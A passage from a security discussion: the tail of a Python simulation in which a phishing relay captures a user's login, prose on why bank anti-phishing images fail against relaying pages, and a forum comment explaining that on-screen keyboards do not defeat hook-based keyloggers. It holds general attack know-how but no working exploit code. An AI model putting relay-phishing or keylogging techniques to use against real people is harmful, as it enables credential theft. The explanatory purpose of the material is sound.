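    results["relay_vs_unregistered"] = bob.login(relay)
    results["relay_captured_after"] = len(relay.captured)
    return results
```

The last two scenarios are the caveat a practitioner should keep in mind: the image and phrase only stop a page that cannot reach the real bank. A page that relays the account number gets the genuine image back, and on a browser with no registered-device credential the challenge question is relayed just as easily, so it is the device credential that gives the customer something to notice, not the picture.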

  68. False sense of security by gr8dude · · Score: 1

    I have taken to using the on-screen keyboard so that I can enter with mouseclicks rather than keypresses if I'm on an untrusted machine, but other than that I can't do much else.

    A mini-remark: typing stuff on an on-screen keyboard will not help you.

    Of course, it depends on the type of keyboard you are using and on the platform, but for instance - Windows' osk.exe (the default one) works by sending WM_KEYUP and WM_KEYDOWN messages to an input window.

    A keylogger that uses hooks to watch messages sent to that window will still see the keystrokes.

    You can try this hint: http://www.lazybit.com/index.php/a/2007/03/01/free_keylogger_protection It will confuse the person who reads the log, but it makes the data entry procedure much longer and error-prone.

    p.s. keystrokes typed inside a virtual machine can also be grabbed, as the host OS "sees" them first, and that's where the keylogger is.